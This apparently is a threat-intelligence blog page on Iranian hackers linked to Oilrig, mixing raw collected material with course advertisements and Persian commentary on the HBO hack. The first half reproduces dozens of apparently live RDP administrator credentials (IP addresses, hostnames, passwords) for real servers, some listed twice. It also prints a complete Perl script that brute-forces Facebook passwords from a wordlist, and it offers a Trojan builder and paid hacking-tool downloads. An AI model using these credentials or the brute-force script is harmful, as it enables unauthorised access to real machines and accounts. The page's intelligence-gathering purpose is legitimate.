Confuser and Oilrig – Iranian Hacks

This is a bit disjointed at this time and is raw data. This is not intelligence, has not been analyzed but does tie directly to Oilrig.

A powerful program to pack your apps. With this program, you can pack programs in C # and VB.Net

Confuser – Confuser program zipped. For download and analysis

a1ir3z4-HK Frequently found on anonysec.org, c-cracking.org, formerly of the Kalli Hack Team (kallihack), http://haraji.8tag.ir

Others in the mix: XVII_Hacker, #XVII_Roman & #BlackErroR1 & #sorblack

BTC BRUTER v.3.0 By UNKNOWN-KILLER

Bitcoin Cracker Performance Test via Telegram: @ a1ir3z4HK @ a1ir3z4_HK_bot
Using temp emails here: http://www.emeil.ir/
Sprinkle the effort with a bit of Russian for flavoring

Cʏʙᴇʀ Cʀᴀᴄᴋɪɴɢ | سایبر کرکینگ

61.155.153.21:3389@SZCN2003X-5984\administrator;1qaz@WSX3edc
123.206.72.128:3389@10_221_112_104\administrator;1qaz@WSX3edc
123.207.139.51:3389@10_10_123_100\administrator;1qaz@WSX3edc
113.108.144.211:3389@ZK\administrator;1qaz@WSX
218.13.56.118:3389@HEGII\administrator;1qaz@WSX
218.17.182.99:3389@DTC-S01\administrator;1qaz@WSX
58.213.155.42:3389@SQL\administrator;1qaz@WSX
218.90.154.154:3389@DHT1FDC2\administrator;1qaz@WSX
218.94.38.222:3389@WIN-3EGCECLJQ5J\administrator;1qaz@WSX
180.107.198.6:3389@HAMBER\administrator;1qaz@WSX
117.89.141.232:3389@DELL-R710\administrator;1qaz@WSX
58.221.10.142:3389@WIN-QUO7ORFGR99\administrator;123qwe!@#
180.112.122.235:3389@HP-SERVER\administrator;123qwe!@#
219.136.229.194:3389@BMYWEB\administrator;1234qwer!@#$
121.9.14.146:3389@WIN-90NIL448CQ4\administrator;1qaz!QAZ
119.145.72.210:3389@WINDOWS-M89UCHU\administrator;1qaz!QAZ
218.93.123.171:3389@USER-A4G6BL8T0O\administrator;1qaz!QAZ
61.160.112.76:3389@NWERPDB\administrator;1qazXSW@
117.80.229.78:3389@KSBOMAN\administrator;1qazXSW@
119.29.157.222:3389@10_135_48_44\administrator;1qazXSW@
61.145.180.174:3389@TEDU-LH\administrator;!QAZ2wsx
113.108.146.83:3389@WIN-QIO2J4TRCMJ\administrator;!QAZ2wsxЧитать полностью…

61.155.153.21:3389@SZCN2003X-5984\administrator;1qaz@WSX3edc
123.206.72.128:3389@10_221_112_104\administrator;1qaz@WSX3edc
123.207.139.51:3389@10_10_123_100\administrator;1qaz@WSX3edc
113.108.144.211:3389@ZK\administrator;1qaz@WSX
218.13.56.118:3389@HEGII\administrator;1qaz@WSX
218.17.182.99:3389@DTC-S01\administrator;1qaz@WSX
58.213.155.42:3389@SQL\administrator;1qaz@WSX
218.90.154.154:3389@DHT1FDC2\administrator;1qaz@WSX
218.94.38.222:3389@WIN-3EGCECLJQ5J\administrator;1qaz@WSX
180.107.198.6:3389@HAMBER\administrator;1qaz@WSX
117.89.141.232:3389@DELL-R710\administrator;1qaz@WSX
58.221.10.142:3389@WIN-QUO7ORFGR99\administrator;123qwe!@#
180.112.122.235:3389@HP-SERVER\administrator;123qwe!@#
219.136.229.194:3389@BMYWEB\administrator;1234qwer!@#$
121.9.14.146:3389@WIN-90NIL448CQ4\administrator;1qaz!QAZ
119.145.72.210:3389@WINDOWS-M89UCHU\administrator;1qaz!QAZ
218.93.123.171:3389@USER-A4G6BL8T0O\administrator;1qaz!QAZ
61.160.112.76:3389@NWERPDB\administrator;1qazXSW@
117.80.229.78:3389@KSBOMAN\administrator;1qazXSW@
119.29.157.222:3389@10_135_48_44\administrator;1qazXSW@
61.145.180.174:3389@TEDU-LH\administrator;!QAZ2wsx
113.108.146.83:3389@WIN-QIO2J4TRCMJ\administrator;!QAZ2wsxЧитать полностью…

182.71.201.2:3389@TECHNOPAK\administrator;p@ssw0rd
150.242.254.98:3389@WINWORLD\administrator;Pass@word1
115.112.155.95:3389@APOLLOHOSPITALS\administrator;P@ssw0rd
221.135.143.132:3389@DMSSERVER\administrator;P@ssw0rd
220.225.210.91:3389@CTL\administrator;P@ssw0rd
45.64.195.147:3389@UNISRV\administrator;P@ssw0rd
125.22.73.198:3389@NAVGGL\administrator;P@ssw0rd
125.22.73.196:3389@NAVGGL\administrator;P@ssw0rd
59.144.162.8:3389@DELLSERVER\administrator;Admin@123
27.54.170.204:3389@DCPLHO\administrator;Admin@123
180.151.71.42:3389@FOURDTECH\administrator;Admin@123
202.47.116.201:3389@JAYAIR\administrator;Admin@123
118.185.53.18:3389@JBBROTHERS\administrator;Admin@123
27.251.117.6:3389@WIN-6T4QFMCPVE8\administrator;Admin123
103.230.152.172:3389@WIN-PMCSC1KVLPH\administrator;admin@123
219.65.58.58:3389@BIOTECH\administrator;admin@123
124.123.99.31:3389@WIN-RJTS2DUSFC1\administrator;admin@123
122.15.47.237:3389@ADMINISTRATOR\administrator;admin@123
125.63.94.107:3389@LAT039010002\administrator;admin@123
103.50.152.53:3389@BIOTECH\administrator;admin@123
117.252.2.69:3389@ADMINISTRATOR\administrator;admin@123
119.226.187.124:3389@WINDOWS-LJLRPML\administrator;admin@123
125.21.48.42:3389@WINDOWS-LJLRPML\administrator;admin@123
223.30.104.27:3389@WIN-ANRHQC2VF3Q\administrator;admin@123
125.20.83.199:3389@DSKE-1\administrator;admin@123
223.30.126.218:3389@CKHO\administrator;admin@123
59.90.244.200:3389@TEEPARAM-SERVER\administrator;Passw0rd1
14.102.15.38:3389@LAB01\administrator;password@123
124.124.70.194:3389@BRIGADEGROUP\administrator;password@123
220.227.9.77:3389@SCINDIASCHOOL\administrator;password@123
122.200.19.58:3389@ASHTE-RFID\administrator;P@ssw0rd@123
61.12.1.3:3389@WINDOWS-CYMSTZH\administrator;password@1234
182.74.185.140:3389@BIBAAPPARELS\administrator;abc@123
180.211.99.2:3389@GCPL\administrator;
112.196.8.202:3389@LIBRARYSERVER\administrator;
118.185.4.242:3389@SRI01\administrator;
Capture
Beast Trojan Builder – (change to .rar to unzip) Use at own risk.
57c4d9a0-63da-46d3-9e16-b720d27b0f6a

Iranian Hacking – Saudi Sites – Bruteforcing facebook zhacker

Music is horrendous – be warned

 

 

and the script:

#!/usr/bin/perl
#

use strict;
use Net::SSLeay::Handle;

if(!defined($ARGV[0] && $ARGV[1])) {

system(‘clear’);
print ” Version 2.32 \n”;
print “\033[1;32md88888b .d8b. .o88b. d88888b d8888b. .d88b. db dD d88888b d8888b. \n”;
print “88′ d8′ `8b d8P Y8 88′ 88 `8D .8P Y8. 88 ,8P’ 88′ 88 `8D \n”;
print “88ooo 88ooo88 8P 88ooooo 88oooY’ 88 88 88,8P 88ooooo 88oobY’ \n”;
print “88~~~ 88~~~88 8b 88~~~~~ 88~~~b. 88 88 88`8b 88~~~~~ 88`8b \n”;
print “88 88 88 Y8b d8 88. 88 8D `8b d8′ 88 `88. 88. 88 `88. \n”;
print “YP YP YP `Y88P’ Y88888P Y8888P’ `Y88P’ YP YD Y88888P 88 YD \n”;

print “\033[1;31m ======================================================\n”;
print “\033[1;37m Usage: perl $0 Email wordlist.txt\n\n\n\n\n\n\n\n\n”;
print “\033[1;31m ======================================================\n”;
print “\n”;
print “\n”;
print “\n”;
print “\n”;
print “\n”;
print “\n”;
exit; }

my $user = $ARGV[0];
my $wordlist = $ARGV[1];

open (LIST, $wordlist) || die “\n[-] Can’t find/open $wordlist\n”;

 

print ” Version 2.32 \n”;
print “\033[1;32md88888b .d8b. .o88b. d88888b d8888b. .d88b. db dD d88888b d8888b. \n”;
print “88′ d8′ `8b d8P Y8 88′ 88 `8D .8P Y8. 88 ,8P’ 88′ 88 `8D \n”;
print “88ooo 88ooo88 8P 88ooooo 88oooY’ 88 88 88,8P 88ooooo 88oobY’ \n”;
print “88~~~ 88~~~88 8b 88~~~~~ 88~~~b. 88 88 88`8b 88~~~~~ 88`8b \n”;
print “88 88 88 Y8b d8 88. 88 8D `8b d8′ 88 `88. 88. 88 `88. \n”;
print “YP YP YP `Y88P’ Y88888P Y8888P’ `Y88P’ YP YD Y88888P 88 YD \n”;

print “\033[1;31m ======================================================\n”;
print “\033[1;33m made by [[Z hacker]] \n”;
print “\033[1;31m ========================================================\n”;

print “\033[1;39m\n [+] Cracking Started on: $user …\n\n”;
print “=======================================\n”;

while (my $password = <LIST>) {
chomp ($password);
$password =~ s/([^^A-Za-z0-9\-_.!~*'()])/ sprintf “%%%0x”, ord $1 /eg;

my $a = “POST /login.php HTTP/1.1”;
my $b = “Host: http://www.facebook.com”;
my $c = “Connection: close”;
my $e = “Cache-Control: max-age=0”;
my $f = “Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8”;
my $g = “Origin: https://www.facebook.com&#8221;;
my $h = “User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31”;
my $i = “Content-Type: application/x-www-form-urlencoded”;
my $j = “Accept-Encoding: gzip,deflate,sdch”;
my $k = “Accept-Language: en-US,en;q=0.8”;
my $l = “Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3”;

my $cookie = “cookie: datr=80ZzUfKqDOjwL8pauwqMjHTa”;
my $post = “lsd=AVpD2t1f&display=&enable_profile_selector=&legacy_return=1&next=&profile_selector_ids=&trynum=1&timezone=300&lgnrnd=031110_Euoh&lgnjs=1366193470&email=$user&pass=$password&default_persistent=0&login=Log+In”;
my $cl = length($post);
my $d = “Content-Length: $cl”;

 

my ($host, $port) = (“www.facebook.com”, 443);

tie(*SSL, “Net::SSLeay::Handle”, $host, $port);

print SSL “$a\n”;
print SSL “$b\n”;
print SSL “$c\n”;
print SSL “$d\n”;
print SSL “$e\n”;
print SSL “$f\n”;
print SSL “$g\n”;
print SSL “$h\n”;
print SSL “$i\n”;
print SSL “$j\n”;
print SSL “$k\n”;
print SSL “$l\n”;
print SSL “$cookie\n\n”;

print SSL “$post\n”;

my $success;
while(my $result = <SSL>){
if($result =~ /Location(.*?)/){
$success = $1;
}
}
if (!defined $success)
{
print “\033[1;31m[-] $password -> Failed \n”;
close SSL;
}
else
{
print “\033[1;32m\n########################################################\n”;
print “[+] \033[1;32mPassword Cracked: $password\n”;
print “\033[1;32m########################################################\n\n”;
close SSL;
exit;
}
}

Rinlogger Teaching

 

Treadstone 71 Selected to Deliver at the RSA Conference 2018 San Francisco

Foundations for a Strong Intelligence Program
April 18, 9AM-11AM RSA Conference
This Lab will explore key aspects of building a strong and long-lasting cyberthreat intelligence program. We’ll review methods of threat intelligence platform selection and bake-off techniques as well as cover stakeholder analysis and priority intelligence requirements. Additionally, we’ll practice collection planning and mission management as well as how to establish effective reporting and dissemination capabilities.

rsa2018
Cyber CounterIntelligence – Deception, Distortion, Dishonesty
April 18, 1:45PM-2:30PM RSA Conference
Deception, distortion, dishonesty are core to social media postings. Our adversaries use these methods concocting stories that create illusions that are meant to leave us divided. The talk will cover methods of countering their messaging while applying these tactics to protect your own organization and brand. Moving from intelligence to counterintelligence is the natural next step in our evolution.

Plague of the Cyber RATS

How a toxic computer code delivered by ‘Remote Access Trojans’ is an invisible army able to take over a petrochemical plant and blow it to pieces

Ironically, said Bardin, it was Stuxnet that led Iran to enhance its offensive capability: ‘If Stuxnet had happened to the US or UK, it would have been seen as an act of war. In Iran, it made them invest heavily in offensive cyber operations.’

He revealed that 18 per cent of Iranian university students are studying computer science – a cyber warfare talent pool.

http://www.dailymail.co.uk/news/article-5404055/How-hackers-using-RAT-malware-seized-petrochemical-site.html

No guns. No bombs. No conventional weapons of any kind. An invisible army able take over a petrochemical plant like this and blow it to pieces. That’s the power of a toxic computer code delivered by RATs – ‘Remote Access Trojans’ – that’s making UK security experts VERY nervous indeed

‘Fixing this takes political will, and business is always pushing back, because good cyber security adds costs,’ said Bardin. ‘Ultimately, something is going to blow up.’

Behzad Mesri – #HBO Hack – Silent Terror

البته سوال اصلی من از همون اول که این دیفیسر رو میشناختم
این بود که چرا اسمش یه o کم داره
skote vahshat – 

BehzadMasri – skote_vahshat Get the scoop here (PDF)

بهزاد مصری

فکر کنم اول اشتباه نوشته و همون معروف شده و توی رو در بایستی مونده

Wired Article
حالا امیدوارم که زندگیش خراب نشه، ولی کاش مقامات به این سوال هم پاسخ میدادن

TBH2

این لاگ ها و پیست ها و دیتابیس هایی که توی فروم های زیرزمینی تبادل میشن رو احتمالن دیدید
هیچ امنیت و پرایوسی ای باقی نمونده و قطعن یکی از مشتریان اینها، یا حتا عامل لیک شدنشون خود سازمان های دولتی و امنیتی هستند
چندان عجیب نیست که یک نفر به این شکل مشخصاتش لو میره…
یعنی واقعن هم خیلی کار سختی نیست، با یه سیستم شخصی هم میشه مشابهش رو انجام داد، دیگه دولت که خیلی دستش بازتره

bm3

اونی که مرتکب یک جرم سایبری بزرگ میشه و لو نمیره یا لو میره ولی پیدا نمیشه خیلی کارش درسته…
واقعن کار سختیه… یعنی دائم باید از دید اونی که می خواد پیداش بکنه به موضوع نگاه بکنه و این از کاری که مرتکبش میشه هم مهم تر و شاید سخت تره

سکات وشات

TBH

ا📌 طلاعات تکمیلی در مورد بهزاد مصری و هک HBO

🔹 کشف حمله سایبری زمانی که Time Warner کمپانی پدر HBO در حال خریده شدن توسط AT&T به مبلغ ۸۵ میلیارد دلار بوده است، اتفاق افتاد. این کشف سهام اچ بی او را کاهش داد.

‼️ مصری ظاهرا نمایشنامه قسمت های ساخته نشده سریال های اچ بی او را نیز سرقت کرده است.

🔹 از سوابق مصرف هک کردن زیرساخت‌های انرژی اتمی اسرائیل می باشد.

🔹۷ اتهام مصری شامل «جرایم رایانه‌ای»، «جرایم مالی»، «اخاذی»، «سرقت هویت» و دیگر جرایم است. باور مقامات آمریکایی این است که وی در حال حاضر در ایران سکونت دارد.

🔹 متن ایمیلی که مصری به هک شدگان فرستاده شامل عبارت زیر بوده است:

“Hi to All losers! Yes it’s true! HBO is hacked!”

BM

🔹 مصری با نام مستعار Skote Vahshat حداقل ده اکسپلویت از نوع SQL Injection ثبت کرده، و ده ها سایت را دیفیس کرده است.

🔹 بر اساس ادعای مصری، وی بیش از ۱.۵ ترابایت داده به سرقت برده است.

🔴 گروه هکری OurMine کنترل حساب توییتر HBO را در شهریور ماه گرفتند. به نظر میرسد رمز این حساب توسط مصری به آنها منتقل شده است.

🔴 یکی از دلایل متهم شدن سریع مصری، تلاش وی برای تماس با خبرنگاران و رسانه های متعدد جهت تحت فشار گذاشتن اچ بی او برای پرداخت مبلغ اخاذی بوده است.

🔹 اولین اقدام مصری یافتن دسترسی از راه دور کارکنان به شبکه اچ بی او بوده که بتواند از همان طریق دسترسی خود به زیرساخت را حفظ نماید.

Status – Iranian Hacking Tools

Iranian Hacking Tools

One time, 24-hour access to download the as-is Iranian Hacking tools. Approximately 1.3GB of use-at-your-own-risk tools, videos, instructions, and other information.

$4,950.00

Many have requested access to the gigabytes of Iranian hacking tools Treadstone 71 has available. You may now access these tools via a payment to Treadstone 71.

Best Regards,

Treadstone 71

Intelligence for the C-Suite and Stakeholders

This is a one-day course designed to educate corporate leadership and stakeholders in cyber and threat intelligence.  There is a general awareness of the need to establish intelligence functions. Many organizations do not have a fundamental understanding of what intelligence is, where the function should reside, how it is different from business and competitive intelligence while understanding the overlaps and natural points of integration. This one day course targets corporate leadership delivering a clear and coherent training that equips stakeholders with the understanding and tools they need to assist in building a successful intelligence program.


Registration Information – Dates and Times TBD

Course High-Level Outline

  • Using Strategic Intelligence
  • Organization and Focus of the Class
  • Background on Strategic Intelligence and Analysis
  • Approaches and Processes
  • Strategic Plan development, acceptance, and dissemination
    • Mission
    • Vision
    • Guiding Principles
    • Roles and Responsibilities
    • Threat Intelligence Perspective
    • Business Intelligence Perspective
    • Competitive Intelligence Perspective
    • Intelligence Strategic Challenges
    • Goals and Initiatives
    • Next Steps
    • Roadmap
  • Stakeholder checklist and stakeholder management groups with strategic and tactical activities definition for intelligence, description of needs and products. This will include:
  • The Future Use of Strategic Intelligence
  • Intelligence: Role, Definitions, and Concepts
  • Basic Concepts Concerning Intelligence
  • The Strategic Intelligence Process – Operations to Tactics
  • The Role of Strategic Intelligence and Its Impact on Stakeholders
    • Operational, Technical, Tactical
  • Why Stakeholders and Executives Need Strategic Analysis:
  • Strategic Analysis Leading to Strategic Decisions
  • Implementing Intelligence Programs
    • The Treadstone 71 Method (Experience with several program builds globally)
  • Challenges for Stakeholders to Accept Intelligence
  • Stakeholder Views: Impact on Intelligence
  • Intelligence as Catalyst for Stakeholders
  • Integrating Analytical Support and the Stakeholder Thought Process
  • Stakeholders and Self-Directed Strategic Processes, Procedures, Methods
  • The Role of Intelligence Management
  • Issues, Tactics, Techniques, Methods, and Principles
  • Managing Intelligence Projects
  • Providing Focused Leadership
    • Leading the Team
    • Understanding Issues and the Process
    • Analysis Overview
    • Collection Management
    • Production Management
      • Evaluation
      • Analysis
      • Integration
      • Interpretation
    • Types of Analysis
      • 14 Types of Analysis
    • Analytic Writing
      • ICD 203, 206, 208
      • Organization, Evidence, Argument, Sources, Pitfalls
      • Use the Title
      • Who/What, Why Now, So What, Impact so far, Outlook, Implications
      • BLUF and AIMS
      • Supervisory Actions
      • Summary Paragraphs
      • Alternative Analysis
      • Clarity and Brevity
      • Peer review
      • Reports and Reporting
        • Feedback
    • Pre-Mortem
    • Post-Mortem
    • Know your professor, get an A – Communicating Up
      • Relevance, Timeliness, Completeness, Accuracy, Usability
    • Briefing Rules
  • Intelligence Analysts and Self-Management
    • High-Level Tasks
  • Analyst Activities
    • Rules for developing analysts – Alignment and as collectors
    • The Role, Responsibilities, and Functions of the Analyst
    • The Analyst’s Roles and Responsibilities – RACI(s)
    • What the Analyst will face
    • Job Descriptions
  • Conclusion
    • The Executive / Stakeholder’s Roadmap
Corporate stakeholders risk investing large amounts of time and money with little positive effect their security, corporate strategies, and business direction. The C-Suite and Stakeholders participating in this course ensures their understanding of the discipline required to build a successful program. The course helps align information security, incident response, security operations, threat and cyber intelligence with the business.

Training Report – Treadstone 71 Cyber Intelligence Tradecraft Professional Certification

“This past week, I had the absolute pleasure of attending the 5-day Treadstone 71 Cyber Intelligence Tradecraft Professional Certification course along with three of my colleagues.  Mr. Jeff Bardin was the instructor and his knowledge and depth in this area is exceptionally impressive!cyberintelt71

The training allows students to gain a better understanding of the cyber intelligence life cycle, the role and value of cyber intelligence relative to online targeting and collection, in modern organizations, businesses, and governments at the completion of this course. In addition, students understand: the methods of online anonymity, the fundamentals behind cyber intelligence collection and analysis, and how these current methods can be employed in our organizations to assist in online operational security and in defense against adversaries. The course was a combination of lecture, hands-on and student deliverables seen by many as an apprenticeship. We completed 4 case studies throughout the week in varying subjects such as Iranian hackers, high financial networks, Russian SCADA equipment, etc.

I would highly recommend this course to anyone looking to further their knowledge in the cyber area.  It will also allow you to become a better intelligence analyst, as a whole.  Overall, it was a truly fantastic learning experience that is applicable in both our personal, as well as professional lives.  I most certainly have a new appreciation for online security and safety.” – Recently certified student February 2017

Blog at WordPress.com.

Up ↑

%d bloggers like this: